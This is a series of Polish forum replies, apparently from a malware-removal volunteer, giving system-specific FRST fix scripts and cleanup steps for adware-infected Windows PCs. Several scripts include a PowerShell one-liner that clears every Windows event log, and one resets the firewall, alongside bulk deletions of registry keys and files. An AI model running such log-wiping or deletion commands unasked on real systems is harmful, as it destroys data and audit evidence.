\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {5C5A47F9-78EE-4F25-8055-DD4466B4EAF5} - \WPD\SqmUpload_S-1-5-21-1292898651-2595707419-3153460295-1001 -> Brak pliku Task: {778835BE-F411-46BF-A2DA-E65D1F07452A} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku Task: {96CAC3C6-F0E9-4A72-98C8-FF95712E75F4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {998249B5-83DB-465B-8B56-D0DA523B166A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {A3346D7F-346B-427D-8C5E-663935A23699} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {B21FD826-B3E3-430C-9CBF-D7F842B08473} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {BCDBC6E7-96E0-44EC-BE5A-0F896EC82821} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {C28F5855-7B85-4CF5-9732-479D590D28D8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku C:\Users\Iwonq\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Program uruchamiający aplikacje Chrome.lnk C:\Users\Iwonq\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\Ad.Block Plus.lnk IE restricted site: HKU\S-1-5-21-1292898651-2595707419-3153460295-1001\...\www-contestwinners.com -> hxxp://www-contestwinners.com SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = C:\Users\Iwonq\Desktop\konkursyNW — skrót.lnk Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Otwórz Google Chrome, a następnie: Ustawienia > karta Rozszerzenia > odinstaluj podejrzanej wyglądający bloker Ad.Block Plus, możesz go wymienić na oryginalnego AdBlock Plus lub wydajnego i skutecznego uBlock Origin. 3. Uruchom AdwCleaner z opcji Szukaj (nie stosuj Oczyść). Po zakończeniu zadania wydobądź raport znajdujący się w C:\AdwCleaner. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

OK, AdwCleaner wykrył jeden odpadkowy klucz należący do podejrzanego tworu "zabezpieczającego", który usuwam oraz jedno rozszerzenie w przeglądarce Google Chrome typu PUP. Oprócz tego odbędzie się ponowne czyszczenie lokalizacji tymczasowych, bo poprzednio zrobiłem literówkę w dyrektywie. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: DeleteKey: HKLM\SOFTWARE\ByteFence FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\343432156.js [2016-11-19] FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\343432156.cfg [2016-11-19] EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Otwórz Google Chrome, a następnie: Ustawienia > karta Rozszerzenia > odinstaluj Chrome Cleaner Pro. 3. Dostarcz plik Fixlog i nowy raport FRST, już bez Addition i Shortcut. Podsumuj obecny stan komputera, napisz czy problem ustąpił itp.

Temat przenoszę do działu Windows XP. Raport nie wykazują oznak infekcji. W spoilerze zadaję do wykonania wątek poboczny, kosmetyka systemowa: kasacja martwych wpisów, pustych skrótów LNK oraz czyszczenie lokalizacji tymczasowych. Przeglądarki, które sprawiały / sprawiają problem proszę przeinstalować. Dostarcz raporty wymagane przez dział Hardware :

Raporty nie wykazują oznak infekcji, ani uszkodzeń. W punkcie pierwszym odbędzie się kasacja szczątek po programach, pustych wpisów i niepotrzebnych wyszukiwarek, ale i również pobór najnowszych danych z Dziennika Zdarzeń. Przeprowadzimy również skan antywirusowy. Dostarcz raporty wymagane przez dział Hardware. 1. Sugeruję pozbyć się produktów marki IObit, nie polecam żadnego programu IOBit tutaj na forum. Nie dość, że adware w instalatorach, to jeszcze inne podejrzane związki partnerskie i niewiarygodne praktyki (w przeszłości zostali złapani na kradzieży bazy definicji MBAM, którą sobie wsadzili w swój program do walki z malware). 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKU\S-1-5-21-880326849-4098947992-1276867927-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1 SearchScopes: HKU\S-1-5-21-880326849-4098947992-1276867927-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-880326849-4098947992-1276867927-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO: Brak nazwy -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> Brak pliku FF Keyword.URL: Mozilla\Firefox\Profiles\3cbutt2l.default -> hxxps://search.avast.com/AV772/search/web?q={searchTerms} FF DefaultSearchEngine: Mozilla\Firefox\Profiles\3cbutt2l.default -> Avast Search FF DefaultSearchUrl: Mozilla\Firefox\Profiles\3cbutt2l.default -> hxxps://search.avast.com/AV772/search/web?q={searchTerms} FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\3cbutt2l.default -> Avast Search FF SelectedSearchEngine: Mozilla\Firefox\Profiles\3cbutt2l.default -> Avast Search FF SearchEngineOrder.3: Mozilla\Firefox\Profiles\3cbutt2l.default -> Bing CHR HomePage: Default -> msn.com CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms} CHR DefaultSearchKeyword: Default -> bing.com CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms} S3 cpuz138; Brak ImagePath S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X] FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku] CMD: type C:\Users\VAIO\AppData\Roaming\Mozilla\Firefox\Profiles\3cbutt2l.default\user.js Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Temat przenoszę do działu Postałe zagadnienia komputerowe, bo oczyściliśmy system z infekcji i szczątek po oprogramowaniu. Zastosuj DelFix. Wyczyść punkty przywracania systemu. Odinstaluj wszystkie niepotrzebne Ci programy. Zaktualizuj system Windows (wszystkie aktualizacje, oprócz nieużytkowanych przez Ciebie pakietów językowych). Zaktualizuj do najnowszych wersji wszystkie programy, które masz zainstalowane. Usuń niepotrzebne Ci dane, resztę posegreguj w foldery. Dostarcz raporty wymagane przez dział Hardware w celu diagnostyki sprzętu. Czy komputer jest regularnie odkurzany z kurzu?

Raporty nie wykazują oznak infekcji. W spoilerze zadaję działania poboczne (kasacja resztek po Malwarebytes, pustych wpisów, skrótów w tym reset pliku Hosts). Spróbuj po prostu przeinstalować wszystkie problematyczne aplikacje.

Problem dot. zaśmiecenia przeglądarek natrętnymi reklamami, przekierowaniami powodują szkodliwe proxy nonestops oraz zarażony plik Hosts (i od strony technicznej oby dwie sekcje będę resetował / przywracał do stanu domyślnego). Po za tym kosmetyka: kasacja resztek po programach, pustych wpisów, skrótów itp. Dezynfekcja: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku C:\Users\Kuba\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk C:\Users\Kuba\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\TripAdvisor.lnk HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe SearchScopes: HKLM-x32 -> {7070D999-EBA4-49A4-A388-6ED1F853B6AB} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk1-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKU\S-1-5-21-2242612375-862427872-1806114010-1001 -> {7070D999-EBA4-49A4-A388-6ED1F853B6AB} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk1-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms} C:\Users\Kuba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk C:\Users\Public\Desktop\ByteFence Anti-Malware.lnk CMD: type C:\Program Files (x86)\mozilla firefox\defaults\pref\343432156.js CMD: type C:\Program Files (x86)\mozilla firefox\343432156.cfg Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} RemoveProxy: Hosts: EmtyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Uruchom AdwCleaner z opcji Szukaj (nie stosuj Oczyść). Po zakończeniu zadania wydobądź raport znajdujący się w C:\AdwCleaner. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Wszystko pomyślnie wykonane. Zagrożenia wykryte przez Malwarebytes daj do kasacji. To zakończy proces dezynfekcji. Podsumuj obecny stan komputera.

Zrób proszę nowe raporty FRST (ale użyj najnowszej wersji), a zajmę się tematem od razu.

Zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść), a następnie wygeneruj nowe raport FRST (FRST, Addition, Shortcut).

Wygląda na to, że system został zainfekowany przez adware PriceFountain. Po za tym sprzątam system z pustych wpisów, skrótów, resztek po programach. 1. Przez Panel Sterownia odinstaluj: Zbędny program sponsorski: McAfee Security Scan Plus. Niezbyt potrzebne oprogramowanie: TuneUp Utilities, Real Alternative 2.0.2. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: Task: {A3EDA98E-B0C6-499A-B7B9-C676D6A2D7E4} - System32\Tasks\DomAversionIncognizantV2 => rundll32.exe PortholesDiversionary.dll,main 7 1 HKLM-x32\...\Run: [] => [X] S1 MpKsl91496d88; \??\C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{2C22EE4D-A23D-49F3-AF4D-B3C1572A0EDD}\MpKsl91496d88.sys [X] BootExecute: autocheck autochk * sdnclean64.exe FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku] DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions C:\Program Files (x86)\Mozilla Firefoxavg-secure-search.xml C:\Program Files (x86)\Mozilla Firefox\plugins C:\ProgramData\Temp C:\ProgramData\Microsoft\Windows\GameExplorer\{6FC613A2-DA72-4C1A-ACEB-AD588112479D} C:\Users\Dom\AppData\Local\Microsoft\Windows\GameExplorer\{07F87C3C-C0D0-4B29-8281-0900F23B3C5A} C:\Users\Dom\AppData\Local\Microsoft\Windows\GameExplorer\{93C652F0-EED8-4506-8FD0-D8F70B792F2B} C:\Users\Dom\AppData\Local\Temp*.html CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware (masz na dysku, więc tylko robisz kompleks aktualizacji). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.